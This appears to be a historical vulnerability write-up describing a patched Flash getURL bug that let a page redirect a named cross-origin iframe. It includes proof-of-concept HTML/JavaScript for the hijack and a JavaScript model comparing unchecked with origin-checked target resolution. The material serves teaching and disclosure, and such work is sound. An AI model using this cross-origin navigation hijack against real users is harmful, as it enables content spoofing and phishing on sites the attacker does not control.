Flash’s getURL method can navigate frames by name, including frames that belong to other domains. By assigning a name to a cross-origin iframe through JavaScript (which was apparently allowed at the time) and then using Flash’s getURL with that name as the target, the attacker can redirect a frame inside a different-origin window to an arbitrary URL.

<object id="oFlash" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"
        codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0"
        width="10" height="10">
    <param name="allowScriptAccess" value="Always" />
    <param name="movie" value="NOTHING_LOADED_YET" />
</object>

<script language="JavaScript">
var newWindow;
function openWindow()
{
    newWindow = window.open("http://www.nature.com");
    alert("Now click on the Hijack button");
}

function hijackIframe()
{
    var strIframeName = "HIJACKED_IFRAME";

    // Naming a cross-origin iframe — apparently legal/allowed
    newWindow[0].name = strIframeName;

    // getURL with the iframe name as target navigates it cross-origin
    oFlash.movie = "geturl.swf?METHOD=get&TARGET=" + strIframeName + "&REDIR=hijacked_iframe.html";
}
</script>

The expected behavior would be for the Flash navigation to open a new window instead of redirecting the cross-origin iframe, since the iframe doesn’t belong to the attacker’s domain. The combination of allowing cross-origin iframe naming with Flash’s unrestricted getURL targeting created a bypass.
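The expected behavior described above, as an added example that is not part of the original post and is not Flash or browser source: a simplified JavaScript model of named-target resolution, with the unchecked global lookup beside an origin-checked one. The origins, helper names and window layout are constructed for illustration.

```javascript
// Simplified model of named-target resolution (added example, not Flash or browser code).
// Origins, helper names and the window layout are constructed for illustration.
function makeFrame(origin, name = "") {
  return { origin, name, url: origin + "/" };
}

// Every frame in every open window, top-level documents included.
function allFrames(windows) {
  return windows.flatMap((w) => [w.top, ...w.children]);
}

// Behaviour the post describes: the name is matched globally and the
// initiator's origin is ignored.
function resolveTargetUnchecked(windows, initiatorOrigin, target) {
  return allFrames(windows).find((f) => f.name === target) || null;
}

// Expected behaviour: a name resolves only to a frame of the initiator's origin.
function resolveTargetChecked(windows, initiatorOrigin, target) {
  const match = (f) => f.name === target && f.origin === initiatorOrigin;
  return allFrames(windows).find(match) || null;
}

// Models getURL(url, target): reuse the resolved frame, otherwise open a new window.
function navigate(windows, resolve, initiatorOrigin, url, target) {
  const frame = resolve(windows, initiatorOrigin, target);
  if (frame) {
    frame.url = url;
    return "navigated-existing-frame";
  }
  windows.push({ top: { origin: initiatorOrigin, name: target, url }, children: [] });
  return "opened-new-window";
}

// Scenario from the post: a second window holds a cross-origin iframe that has been named.
function demo(resolve) {
  const initiator = "http://attacker.example";
  const windows = [
    { top: makeFrame(initiator), children: [] },
    { top: makeFrame("http://victim.example"), children: [makeFrame("http://frame.example")] },
  ];
  const iframe = windows[1].children[0];
  iframe.name = "HIJACKED_IFRAME";
  const result = navigate(windows, resolve, initiator, initiator + "/hijacked_iframe.html", "HIJACKED_IFRAME");
  return { result, iframeUrl: iframe.url, windowCount: windows.length };
}
```

With `resolveTargetUnchecked` the victim window's iframe ends up on the initiator's URL; with `resolveTargetChecked` the iframe is untouched and the navigation lands in a new window. The model covers only target resolution, not the cross-origin name assignment that the post identifies as the other half of the problem.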

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.